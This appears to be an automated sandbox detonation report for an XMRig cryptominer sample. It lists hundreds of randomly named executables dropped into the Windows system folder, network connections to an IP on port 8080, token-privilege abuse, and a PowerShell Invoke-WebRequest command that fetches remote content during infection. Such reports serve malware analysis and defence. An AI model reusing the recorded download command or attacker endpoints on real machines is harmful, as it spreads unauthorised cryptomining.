C:\Windows\System\vAdjnzk.exe

C:\Windows\System\vAdjnzk.exe

C:\Windows\System\qfIfeyE.exe

C:\Windows\System\qfIfeyE.exe

C:\Windows\System\ujoXvLs.exe

C:\Windows\System\ujoXvLs.exe

C:\Windows\System\IlhNMbG.exe

C:\Windows\System\IlhNMbG.exe

C:\Windows\System\HMRSVHR.exe

C:\Windows\System\HMRSVHR.exe

C:\Windows\System\hTYoEpQ.exe

C:\Windows\System\hTYoEpQ.exe

C:\Windows\System\pEKsoig.exe

C:\Windows\System\pEKsoig.exe

C:\Windows\System\xUtZzES.exe

C:\Windows\System\xUtZzES.exe

C:\Windows\System\CuAfATR.exe

C:\Windows\System\CuAfATR.exe

C:\Windows\System\GavDlKH.exe

C:\Windows\System\GavDlKH.exe

C:\Windows\System\NCGROdM.exe

C:\Windows\System\NCGROdM.exe

C:\Windows\System\RmSqQWb.exe

C:\Windows\System\RmSqQWb.exe

C:\Windows\System\uVZBkNM.exe

C:\Windows\System\uVZBkNM.exe

C:\Windows\System\nQGTtZM.exe

C:\Windows\System\nQGTtZM.exe

C:\Windows\System\IJmxqkl.exe

C:\Windows\System\IJmxqkl.exe

C:\Windows\System\LswCpJV.exe

C:\Windows\System\LswCpJV.exe

C:\Windows\System\cCIhvwj.exe

C:\Windows\System\cCIhvwj.exe

C:\Windows\System\xTEBtdY.exe

C:\Windows\System\xTEBtdY.exe

C:\Windows\System\TKPfZOx.exe

C:\Windows\System\TKPfZOx.exe

C:\Windows\System\eONXTaE.exe

C:\Windows\System\eONXTaE.exe

C:\Windows\System\WcdIiAr.exe

C:\Windows\System\WcdIiAr.exe

C:\Windows\System\wAxgCUX.exe

C:\Windows\System\wAxgCUX.exe

C:\Windows\System\GqWniGg.exe

C:\Windows\System\GqWniGg.exe

C:\Windows\System\jnUOKKM.exe

C:\Windows\System\jnUOKKM.exe

C:\Windows\System\ThCDhcE.exe

C:\Windows\System\ThCDhcE.exe

C:\Windows\System\psFnzaL.exe

C:\Windows\System\psFnzaL.exe

C:\Windows\System\yapJWJS.exe

C:\Windows\System\yapJWJS.exe

C:\Windows\System\dAmMzhl.exe

C:\Windows\System\dAmMzhl.exe

C:\Windows\System\FQTeSya.exe

C:\Windows\System\FQTeSya.exe

C:\Windows\System\XRHEKAI.exe

C:\Windows\System\XRHEKAI.exe

C:\Windows\System\GNjgNTk.exe

C:\Windows\System\GNjgNTk.exe

C:\Windows\System\aCEXIaN.exe

C:\Windows\System\aCEXIaN.exe

C:\Windows\System\vDZsGbX.exe

C:\Windows\System\vDZsGbX.exe

C:\Windows\System\cfhBjZK.exe

C:\Windows\System\cfhBjZK.exe

C:\Windows\System\obExSgO.exe

C:\Windows\System\obExSgO.exe

C:\Windows\System\RgYqdFg.exe

C:\Windows\System\RgYqdFg.exe

C:\Windows\System\ICRRFvN.exe

C:\Windows\System\ICRRFvN.exe

C:\Windows\System\JXFllSb.exe

C:\Windows\System\JXFllSb.exe

C:\Windows\System\ncOkOdY.exe

C:\Windows\System\ncOkOdY.exe

C:\Windows\System\MCgzkkY.exe

C:\Windows\System\MCgzkkY.exe

C:\Windows\System\YlLwPBs.exe

C:\Windows\System\YlLwPBs.exe

C:\Windows\System\ACKRAte.exe

C:\Windows\System\ACKRAte.exe

C:\Windows\System\TzqVDvE.exe

C:\Windows\System\TzqVDvE.exe

C:\Windows\System\ICVcDzd.exe

C:\Windows\System\ICVcDzd.exe

C:\Windows\System\KIazxle.exe

C:\Windows\System\KIazxle.exe

C:\Windows\System\sEeLrjj.exe

C:\Windows\System\sEeLrjj.exe

C:\Windows\System\WBGfQEI.exe

C:\Windows\System\WBGfQEI.exe

C:\Windows\System\AbYRnCv.exe

C:\Windows\System\AbYRnCv.exe

C:\Windows\System\mXrJqRW.exe

C:\Windows\System\mXrJqRW.exe

C:\Windows\System\yyfoYqy.exe

C:\Windows\System\yyfoYqy.exe

C:\Windows\System\CNGrzAk.exe

C:\Windows\System\CNGrzAk.exe

C:\Windows\System\iXgzmJT.exe

C:\Windows\System\iXgzmJT.exe

C:\Windows\System\CAFTYgC.exe

C:\Windows\System\CAFTYgC.exe

C:\Windows\System\SjWddnL.exe

C:\Windows\System\SjWddnL.exe

C:\Windows\System\HsmEbIC.exe

C:\Windows\System\HsmEbIC.exe

C:\Windows\System\ukLWzzn.exe

C:\Windows\System\ukLWzzn.exe

C:\Windows\System\rZFKlFX.exe

C:\Windows\System\rZFKlFX.exe

C:\Windows\System\rZTetlG.exe

C:\Windows\System\rZTetlG.exe

C:\Windows\System\cMvdTRq.exe

C:\Windows\System\cMvdTRq.exe

C:\Windows\System\zvxiQIw.exe

C:\Windows\System\zvxiQIw.exe

C:\Windows\System\PmVBorO.exe

C:\Windows\System\PmVBorO.exe

C:\Windows\System\pCalEIS.exe

C:\Windows\System\pCalEIS.exe

C:\Windows\System\daRTjGX.exe

C:\Windows\System\daRTjGX.exe

C:\Windows\System\msBLfeV.exe

C:\Windows\System\msBLfeV.exe

C:\Windows\System\YkcxXrb.exe

C:\Windows\System\YkcxXrb.exe

C:\Windows\System\NSTjatg.exe

C:\Windows\System\NSTjatg.exe

C:\Windows\System\SQymjWM.exe

C:\Windows\System\SQymjWM.exe

C:\Windows\System\DubVpVX.exe

C:\Windows\System\DubVpVX.exe

C:\Windows\System\UYgCTIU.exe

C:\Windows\System\UYgCTIU.exe

C:\Windows\System\XHLnTfO.exe

C:\Windows\System\XHLnTfO.exe

C:\Windows\System\ziaeJVi.exe

C:\Windows\System\ziaeJVi.exe

C:\Windows\System\ENRfQRC.exe

C:\Windows\System\ENRfQRC.exe

C:\Windows\System\eHptGjM.exe

C:\Windows\System\eHptGjM.exe

C:\Windows\System\SbsGJRG.exe

C:\Windows\System\SbsGJRG.exe

C:\Windows\System\dYSnmEL.exe

C:\Windows\System\dYSnmEL.exe

C:\Windows\System\PwfWYAg.exe

C:\Windows\System\PwfWYAg.exe

C:\Windows\System\fESsmvx.exe

C:\Windows\System\fESsmvx.exe

C:\Windows\System\NqMOOTB.exe

C:\Windows\System\NqMOOTB.exe

C:\Windows\System\BSMSJtO.exe

C:\Windows\System\BSMSJtO.exe

C:\Windows\System\tKBNxGk.exe

C:\Windows\System\tKBNxGk.exe

C:\Windows\System\eFiQroc.exe

C:\Windows\System\eFiQroc.exe

C:\Windows\System\cGtCHRE.exe

C:\Windows\System\cGtCHRE.exe

C:\Windows\System\xnqmypp.exe

C:\Windows\System\xnqmypp.exe

C:\Windows\System\ZZtPPIq.exe

C:\Windows\System\ZZtPPIq.exe

C:\Windows\System\DuoOvHM.exe

C:\Windows\System\DuoOvHM.exe

C:\Windows\System\FGOGbhE.exe

C:\Windows\System\FGOGbhE.exe

C:\Windows\System\BUdzTSQ.exe

C:\Windows\System\BUdzTSQ.exe

C:\Windows\System\IollADd.exe

C:\Windows\System\IollADd.exe

C:\Windows\System\WXMfMxp.exe

C:\Windows\System\WXMfMxp.exe

C:\Windows\System\amFdWzz.exe

C:\Windows\System\amFdWzz.exe

C:\Windows\System\HbRTSnQ.exe

C:\Windows\System\HbRTSnQ.exe

C:\Windows\System\jssvFGi.exe

C:\Windows\System\jssvFGi.exe

C:\Windows\System\PfUqTYW.exe

C:\Windows\System\PfUqTYW.exe

C:\Windows\System\cWgMmSm.exe

C:\Windows\System\cWgMmSm.exe

C:\Windows\System\PdwlzAX.exe

C:\Windows\System\PdwlzAX.exe

C:\Windows\System\mHBWJxG.exe

C:\Windows\System\mHBWJxG.exe

C:\Windows\System\xEdSnqr.exe

C:\Windows\System\xEdSnqr.exe

C:\Windows\System\dBfWlMV.exe

C:\Windows\System\dBfWlMV.exe

C:\Windows\System\DNjIGNs.exe

C:\Windows\System\DNjIGNs.exe

C:\Windows\System\WYxxZVZ.exe

C:\Windows\System\WYxxZVZ.exe

C:\Windows\System\sgdEMOx.exe

C:\Windows\System\sgdEMOx.exe

C:\Windows\System\UVOZtHP.exe

C:\Windows\System\UVOZtHP.exe

C:\Windows\System\tgbvxYP.exe

C:\Windows\System\tgbvxYP.exe

C:\Windows\System\bgwRCvV.exe

C:\Windows\System\bgwRCvV.exe

C:\Windows\System\jisoZJm.exe

C:\Windows\System\jisoZJm.exe

C:\Windows\System\wkLMYqO.exe

C:\Windows\System\wkLMYqO.exe

C:\Windows\System\BlcJWCf.exe

C:\Windows\System\BlcJWCf.exe

C:\Windows\System\XqjxkdU.exe

C:\Windows\System\XqjxkdU.exe

C:\Windows\System\lzhUZwK.exe

C:\Windows\System\lzhUZwK.exe

C:\Windows\System\wKPNnyA.exe

C:\Windows\System\wKPNnyA.exe

C:\Windows\System\tijqmDZ.exe

C:\Windows\System\tijqmDZ.exe

C:\Windows\System\kJXbWKE.exe

C:\Windows\System\kJXbWKE.exe

C:\Windows\System\tJytQhN.exe

C:\Windows\System\tJytQhN.exe

C:\Windows\System\LtakBed.exe

C:\Windows\System\LtakBed.exe

C:\Windows\System\fnSGVJF.exe

C:\Windows\System\fnSGVJF.exe

C:\Windows\System\YWkSGsR.exe

C:\Windows\System\YWkSGsR.exe

C:\Windows\System\nXExeBM.exe

C:\Windows\System\nXExeBM.exe

C:\Windows\System\sYsMPPn.exe

C:\Windows\System\sYsMPPn.exe

C:\Windows\System\LQbxKkc.exe

C:\Windows\System\LQbxKkc.exe

C:\Windows\System\UzEUibM.exe

C:\Windows\System\UzEUibM.exe

C:\Windows\System\wceBoYo.exe

C:\Windows\System\wceBoYo.exe

C:\Windows\System\QxffUxn.exe

C:\Windows\System\QxffUxn.exe

C:\Windows\System\PheURUQ.exe

C:\Windows\System\PheURUQ.exe

C:\Windows\System\hOkuPRn.exe

C:\Windows\System\hOkuPRn.exe

C:\Windows\System\DPoPAtG.exe

C:\Windows\System\DPoPAtG.exe

C:\Windows\System\ZTFcnvw.exe

C:\Windows\System\ZTFcnvw.exe

C:\Windows\System\QaEmwMG.exe

C:\Windows\System\QaEmwMG.exe

C:\Windows\System\bILUeOh.exe

C:\Windows\System\bILUeOh.exe

C:\Windows\System\qHJMyJx.exe

C:\Windows\System\qHJMyJx.exe

C:\Windows\System\EvrjSMm.exe

C:\Windows\System\EvrjSMm.exe

C:\Windows\System\YfpoIBb.exe

C:\Windows\System\YfpoIBb.exe

C:\Windows\System\HnjqpCI.exe

C:\Windows\System\HnjqpCI.exe

C:\Windows\System\YfUtTlO.exe

C:\Windows\System\YfUtTlO.exe

C:\Windows\System\uYpMIYz.exe

C:\Windows\System\uYpMIYz.exe

C:\Windows\System\JoMGtwU.exe

C:\Windows\System\JoMGtwU.exe

C:\Windows\System\KpNRrDZ.exe

C:\Windows\System\KpNRrDZ.exe

C:\Windows\System\INVpEVG.exe

C:\Windows\System\INVpEVG.exe

C:\Windows\System\NuxExQS.exe

C:\Windows\System\NuxExQS.exe

C:\Windows\System\QGLITcp.exe

C:\Windows\System\QGLITcp.exe

C:\Windows\System\PnqgrJx.exe

C:\Windows\System\PnqgrJx.exe

C:\Windows\System\LTvQYeV.exe

C:\Windows\System\LTvQYeV.exe

C:\Windows\System\jwIbWkv.exe

C:\Windows\System\jwIbWkv.exe

C:\Windows\System\PflgPpD.exe

C:\Windows\System\PflgPpD.exe

C:\Windows\System\PjGtbHc.exe

C:\Windows\System\PjGtbHc.exe

C:\Windows\System\Cpvchzk.exe

C:\Windows\System\Cpvchzk.exe

C:\Windows\System\HVKQayj.exe

C:\Windows\System\HVKQayj.exe

C:\Windows\System\PKiShQY.exe

C:\Windows\System\PKiShQY.exe

C:\Windows\System\xWcUeoM.exe

C:\Windows\System\xWcUeoM.exe

C:\Windows\System\sjLoSGO.exe

C:\Windows\System\sjLoSGO.exe

C:\Windows\System\jRtOmEu.exe

C:\Windows\System\jRtOmEu.exe

C:\Windows\System\ZaHYnxI.exe

C:\Windows\System\ZaHYnxI.exe

C:\Windows\System\BwWEgRP.exe

C:\Windows\System\BwWEgRP.exe

C:\Windows\System\OKkSuRr.exe

C:\Windows\System\OKkSuRr.exe

C:\Windows\System\jfhSqNa.exe

C:\Windows\System\jfhSqNa.exe

C:\Windows\System\MHNIoyt.exe

C:\Windows\System\MHNIoyt.exe

C:\Windows\System\GpRghNr.exe

C:\Windows\System\GpRghNr.exe

C:\Windows\System\hsJRWuI.exe

C:\Windows\System\hsJRWuI.exe

C:\Windows\System\PAedlip.exe

C:\Windows\System\PAedlip.exe

C:\Windows\System\Rirbobh.exe

C:\Windows\System\Rirbobh.exe

C:\Windows\System\dztNzxy.exe

C:\Windows\System\dztNzxy.exe

C:\Windows\System\sKHqkjQ.exe

C:\Windows\System\sKHqkjQ.exe

C:\Windows\System\OlgAFQG.exe

C:\Windows\System\OlgAFQG.exe

C:\Windows\System\ZaSqAbA.exe

C:\Windows\System\ZaSqAbA.exe

C:\Windows\System\ZSsNtne.exe

C:\Windows\System\ZSsNtne.exe

C:\Windows\System\HUVXwJL.exe

C:\Windows\System\HUVXwJL.exe

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4520" "2956" "2744" "2960" "0" "0" "2964" "0" "0" "0" "0" "0"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 02:52

Reported

2024-05-27 02:54

Platform

win7-20240508-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A

UPX packed file

upx

Drops file in Windows directory

File created C:\Windows\System\lFDkZAa.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\hLNnuWn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\XrfqrVn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\adqFxil.exe

C:\Windows\System\moQAANk.exe

C:\Windows\System\moQAANk.exe

C:\Windows\System\XrfqrVn.exe

C:\Windows\System\XrfqrVn.exe

C:\Windows\System\jbYdvkr.exe

C:\Windows\System\jbYdvkr.exe

C:\Windows\System\aeAKlVp.exe

C:\Windows\System\aeAKlVp.exe

C:\Windows\System\ppoptvf.exe

C:\Windows\System\ppoptvf.exe

C:\Windows\System\gmVEngc.exe

C:\Windows\System\gmVEngc.exe

C:\Windows\System\OTfYtmw.exe

C:\Windows\System\OTfYtmw.exe

C:\Windows\System\aMAMTjo.exe

C:\Windows\System\aMAMTjo.exe

C:\Windows\System\vPbwFgM.exe

C:\Windows\System\vPbwFgM.exe

C:\Windows\System\EfeBRsb.exe

C:\Windows\System\EfeBRsb.exe

C:\Windows\System\iXsWCFv.exe

C:\Windows\System\iXsWCFv.exe

C:\Windows\System\zHnTrBo.exe

C:\Windows\System\zHnTrBo.exe

C:\Windows\System\lZrJOiG.exe

C:\Windows\System\lZrJOiG.exe

C:\Windows\System\udxmiMx.exe

C:\Windows\System\udxmiMx.exe

C:\Windows\System\GaodnDN.exe

C:\Windows\System\GaodnDN.exe

C:\Windows\System\DrXmGdm.exe

C:\Windows\System\DrXmGdm.exe

C:\Windows\System\oUWVGsp.exe

C:\Windows\System\oUWVGsp.exe

C:\Windows\System\VjkjPku.exe

C:\Windows\System\VjkjPku.exe

C:\Windows\System\UZKosjp.exe

C:\Windows\System\UZKosjp.exe

C:\Windows\System\UBCopqC.exe

C:\Windows\System\UBCopqC.exe

C:\Windows\System\whkwrQN.exe

C:\Windows\System\whkwrQN.exe

C:\Windows\System\cGnFSWo.exe

C:\Windows\System\cGnFSWo.exe

C:\Windows\System\CIreLXj.exe

C:\Windows\System\CIreLXj.exe

C:\Windows\System\UzUUFdT.exe

C:\Windows\System\UzUUFdT.exe

C:\Windows\System\okLypJA.exe

C:\Windows\System\okLypJA.exe

C:\Windows\System\dUecHyu.exe

C:\Windows\System\dUecHyu.exe

C:\Windows\System\swKrQSu.exe

C:\Windows\System\swKrQSu.exe

C:\Windows\System\uHtLpwk.exe

C:\Windows\System\uHtLpwk.exe

C:\Windows\System\hrYGdlr.exe

C:\Windows\System\hrYGdlr.exe

C:\Windows\System\DHqKcSR.exe

C:\Windows\System\DHqKcSR.exe

C:\Windows\System\tcMaKyG.exe

C:\Windows\System\tcMaKyG.exe

C:\Windows\System\GAEUinf.exe

C:\Windows\System\GAEUinf.exe

C:\Windows\System\LYSbhXp.exe

C:\Windows\System\LYSbhXp.exe

C:\Windows\System\mirjRTA.exe

C:\Windows\System\mirjRTA.exe

C:\Windows\System\KgPuDRO.exe

C:\Windows\System\KgPuDRO.exe

C:\Windows\System\NUAvCjI.exe

C:\Windows\System\NUAvCjI.exe

C:\Windows\System\QKYLdDK.exe

C:\Windows\System\QKYLdDK.exe

C:\Windows\System\KnZOciD.exe

C:\Windows\System\KnZOciD.exe

C:\Windows\System\tgZkmMG.exe

C:\Windows\System\tgZkmMG.exe

C:\Windows\System\wASnTHI.exe

C:\Windows\System\wASnTHI.exe

C:\Windows\System\Btrphke.exe

C:\Windows\System\Btrphke.exe

C:\Windows\System\rWmSEVK.exe

C:\Windows\System\rWmSEVK.exe

C:\Windows\System\NOpiewn.exe

C:\Windows\System\NOpiewn.exe

C:\Windows\System\JqhYNvk.exe

C:\Windows\System\JqhYNvk.exe

C:\Windows\System\eIDPQLu.exe

C:\Windows\System\eIDPQLu.exe

C:\Windows\System\tPLbCOn.exe

C:\Windows\System\tPLbCOn.exe

C:\Windows\System\ebsUuHe.exe

C:\Windows\System\ebsUuHe.exe

C:\Windows\System\MyMDxit.exe

C:\Windows\System\MyMDxit.exe

C:\Windows\System\YKyJHIr.exe

C:\Windows\System\YKyJHIr.exe

C:\Windows\System\LDQTVsH.exe

C:\Windows\System\LDQTVsH.exe

C:\Windows\System\qshGdaj.exe

C:\Windows\System\qshGdaj.exe

C:\Windows\System\tXFpaUu.exe

C:\Windows\System\tXFpaUu.exe

C:\Windows\System\FmYYpNu.exe

C:\Windows\System\FmYYpNu.exe

C:\Windows\System\JPdekvK.exe

C:\Windows\System\JPdekvK.exe

C:\Windows\System\KShxHHt.exe

C:\Windows\System\KShxHHt.exe

C:\Windows\System\EklWqXA.exe

C:\Windows\System\EklWqXA.exe

C:\Windows\System\TdALUtL.exe

C:\Windows\System\TdALUtL.exe

C:\Windows\System\CdYsINj.exe

C:\Windows\System\CdYsINj.exe

C:\Windows\System\WdZNjvw.exe

C:\Windows\System\WdZNjvw.exe

C:\Windows\System\TuizEmc.exe

C:\Windows\System\TuizEmc.exe

C:\Windows\System\dOBWTCb.exe

C:\Windows\System\dOBWTCb.exe

C:\Windows\System\lmEwMKq.exe

C:\Windows\System\lmEwMKq.exe

C:\Windows\System\koJGtiH.exe

C:\Windows\System\koJGtiH.exe

C:\Windows\System\caMXXrM.exe

C:\Windows\System\caMXXrM.exe

C:\Windows\System\fKfcERY.exe

C:\Windows\System\fKfcERY.exe

C:\Windows\System\XVMjnaJ.exe

C:\Windows\System\XVMjnaJ.exe

C:\Windows\System\AcCaRyJ.exe

C:\Windows\System\AcCaRyJ.exe

C:\Windows\System\sesrVYR.exe

C:\Windows\System\sesrVYR.exe

C:\Windows\System\ZbjoQgc.exe

C:\Windows\System\ZbjoQgc.exe

C:\Windows\System\MkflHjg.exe

C:\Windows\System\MkflHjg.exe

C:\Windows\System\tZVSjLc.exe

C:\Windows\System\tZVSjLc.exe

C:\Windows\System\LLdQlte.exe

C:\Windows\System\LLdQlte.exe

C:\Windows\System\VMMorPx.exe

C:\Windows\System\VMMorPx.exe

C:\Windows\System\tFcPsaS.exe

C:\Windows\System\tFcPsaS.exe

C:\Windows\System\WGLXJws.exe

C:\Windows\System\WGLXJws.exe

C:\Windows\System\pUifUFu.exe

C:\Windows\System\pUifUFu.exe

C:\Windows\System\oyNMhId.exe

C:\Windows\System\oyNMhId.exe

C:\Windows\System\DlOXkQn.exe

C:\Windows\System\DlOXkQn.exe

C:\Windows\System\JAGfGUk.exe

C:\Windows\System\JAGfGUk.exe

C:\Windows\System\RWxyfJc.exe

C:\Windows\System\RWxyfJc.exe

C:\Windows\System\kMrSHqO.exe

C:\Windows\System\kMrSHqO.exe

C:\Windows\System\kBnYRua.exe

C:\Windows\System\kBnYRua.exe

C:\Windows\System\KMmauHe.exe

C:\Windows\System\KMmauHe.exe

C:\Windows\System\lYabrEY.exe

C:\Windows\System\lYabrEY.exe

C:\Windows\System\ptcVVUx.exe

C:\Windows\System\ptcVVUx.exe

C:\Windows\System\wUZahBT.exe

C:\Windows\System\wUZahBT.exe

C:\Windows\System\jOocNRZ.exe

C:\Windows\System\jOocNRZ.exe

C:\Windows\System\dLloZar.exe

C:\Windows\System\dLloZar.exe

C:\Windows\System\XOGnidW.exe

C:\Windows\System\XOGnidW.exe

C:\Windows\System\KEzWMWn.exe

C:\Windows\System\KEzWMWn.exe

C:\Windows\System\mZnZvvo.exe

C:\Windows\System\mZnZvvo.exe

C:\Windows\System\CONsbKC.exe

C:\Windows\System\CONsbKC.exe

C:\Windows\System\feGaOFo.exe

C:\Windows\System\feGaOFo.exe

C:\Windows\System\tsMTNtD.exe

C:\Windows\System\tsMTNtD.exe

C:\Windows\System\DbyAfpM.exe

C:\Windows\System\DbyAfpM.exe

C:\Windows\System\HTFsELm.exe

C:\Windows\System\HTFsELm.exe

C:\Windows\System\SLQLJOt.exe

C:\Windows\System\SLQLJOt.exe

C:\Windows\System\qWbmCsm.exe

C:\Windows\System\qWbmCsm.exe

C:\Windows\System\PtKyerC.exe

C:\Windows\System\PtKyerC.exe

C:\Windows\System\bYZTnKe.exe

C:\Windows\System\bYZTnKe.exe

C:\Windows\System\szwXcQr.exe

C:\Windows\System\szwXcQr.exe

C:\Windows\System\wTVHjAy.exe

C:\Windows\System\wTVHjAy.exe

C:\Windows\System\ORnjwFX.exe

C:\Windows\System\ORnjwFX.exe

C:\Windows\System\XHZuHDQ.exe

C:\Windows\System\XHZuHDQ.exe

C:\Windows\System\HNlIRst.exe

C:\Windows\System\HNlIRst.exe

C:\Windows\System\qVZopsX.exe

C:\Windows\System\qVZopsX.exe

C:\Windows\System\Pmyfjqo.exe

C:\Windows\System\Pmyfjqo.exe

C:\Windows\System\NViwteF.exe

C:\Windows\System\NViwteF.exe

C:\Windows\System\OXTmlXP.exe

C:\Windows\System\OXTmlXP.exe

C:\Windows\System\hLIaJLP.exe

C:\Windows\System\hLIaJLP.exe

C:\Windows\System\iJclKCE.exe

C:\Windows\System\iJclKCE.exe

C:\Windows\System\CMaFqZE.exe

C:\Windows\System\CMaFqZE.exe

C:\Windows\System\NjiSfZk.exe

C:\Windows\System\NjiSfZk.exe

C:\Windows\System\NgHuqab.exe

C:\Windows\System\NgHuqab.exe

C:\Windows\System\gKCqUKO.exe

C:\Windows\System\gKCqUKO.exe

C:\Windows\System\SypPMXe.exe

C:\Windows\System\SypPMXe.exe

C:\Windows\System\pVkGzlK.exe

C:\Windows\System\pVkGzlK.exe

C:\Windows\System\jDGTBFQ.exe

C:\Windows\System\jDGTBFQ.exe

C:\Windows\System\XneExxT.exe

C:\Windows\System\XneExxT.exe

C:\Windows\System\pNLBdxO.exe

C:\Windows\System\pNLBdxO.exe

C:\Windows\System\CmPqvqK.exe

C:\Windows\System\CmPqvqK.exe

C:\Windows\System\kxbqvPi.exe

C:\Windows\System\kxbqvPi.exe

C:\Windows\System\NohzBry.exe

C:\Windows\System\NohzBry.exe

C:\Windows\System\ZGKpNPt.exe

C:\Windows\System\ZGKpNPt.exe

C:\Windows\System\QelVuMS.exe

C:\Windows\System\QelVuMS.exe

C:\Windows\System\HPiTLRl.exe

C:\Windows\System\HPiTLRl.exe

C:\Windows\System\HgpHsjE.exe

C:\Windows\System\HgpHsjE.exe

C:\Windows\System\scEnNPA.exe

C:\Windows\System\scEnNPA.exe

C:\Windows\System\tnQwHGX.exe

C:\Windows\System\tnQwHGX.exe

C:\Windows\System\ewnbgSg.exe

C:\Windows\System\ewnbgSg.exe

C:\Windows\System\uKiNeNh.exe

C:\Windows\System\uKiNeNh.exe

C:\Windows\System\iiGBjBl.exe

C:\Windows\System\iiGBjBl.exe

C:\Windows\System\jqWhLEO.exe

C:\Windows\System\jqWhLEO.exe

C:\Windows\System\Yaikxgb.exe

C:\Windows\System\Yaikxgb.exe

C:\Windows\System\qcbPhbt.exe

C:\Windows\System\qcbPhbt.exe

C:\Windows\System\LTCKIHZ.exe

C:\Windows\System\LTCKIHZ.exe

C:\Windows\System\uMndbsC.exe

C:\Windows\System\uMndbsC.exe

C:\Windows\System\RRdkfIe.exe

C:\Windows\System\RRdkfIe.exe

C:\Windows\System\hgTMVNR.exe

C:\Windows\System\hgTMVNR.exe

C:\Windows\System\jIVXLWm.exe

C:\Windows\System\jIVXLWm.exe

C:\Windows\System\tSOlEVt.exe

C:\Windows\System\tSOlEVt.exe

C:\Windows\System\wxXpMPN.exe

C:\Windows\System\wxXpMPN.exe

C:\Windows\System\xHYbklF.exe

C:\Windows\System\xHYbklF.exe

C:\Windows\System\WLWYUED.exe

C:\Windows\System\WLWYUED.exe

C:\Windows\System\TrWvaud.exe

C:\Windows\System\TrWvaud.exe

C:\Windows\System\VEiImbG.exe

C:\Windows\System\VEiImbG.exe

C:\Windows\System\gCPEewP.exe

C:\Windows\System\gCPEewP.exe

C:\Windows\System\uePseAZ.exe

C:\Windows\System\uePseAZ.exe

C:\Windows\System\EOYErUm.exe

C:\Windows\System\EOYErUm.exe

C:\Windows\System\EWcnxSh.exe

C:\Windows\System\EWcnxSh.exe

C:\Windows\System\CWsUQSo.exe

C:\Windows\System\CWsUQSo.exe

C:\Windows\System\AwpCSNI.exe

C:\Windows\System\AwpCSNI.exe

C:\Windows\System\hLyouIC.exe

C:\Windows\System\hLyouIC.exe

C:\Windows\System\htHndqR.exe

C:\Windows\System\htHndqR.exe

C:\Windows\System\gSKvYjp.exe

C:\Windows\System\gSKvYjp.exe

C:\Windows\System\mQPOTyM.exe

C:\Windows\System\mQPOTyM.exe

C:\Windows\System\XXPAXIe.exe

C:\Windows\System\XXPAXIe.exe

C:\Windows\System\TsjYBcg.exe

C:\Windows\System\TsjYBcg.exe

C:\Windows\System\PfQdcIL.exe

C:\Windows\System\PfQdcIL.exe

C:\Windows\System\etpSrbu.exe

C:\Windows\System\etpSrbu.exe

C:\Windows\System\GanDGeb.exe

C:\Windows\System\GanDGeb.exe

C:\Windows\System\nYiviIu.exe

C:\Windows\System\nYiviIu.exe

C:\Windows\System\ceyTowo.exe

C:\Windows\System\ceyTowo.exe

C:\Windows\System\NkbjeLm.exe

C:\Windows\System\NkbjeLm.exe

C:\Windows\System\poeefwK.exe

C:\Windows\System\poeefwK.exe

C:\Windows\System\GDuCMHB.exe

C:\Windows\System\GDuCMHB.exe

C:\Windows\System\aDkNNeV.exe

C:\Windows\System\aDkNNeV.exe

C:\Windows\System\PknngXF.exe

C:\Windows\System\PknngXF.exe

C:\Windows\System\cZwTaKw.exe

C:\Windows\System\cZwTaKw.exe

C:\Windows\System\WRrXusN.exe

C:\Windows\System\WRrXusN.exe

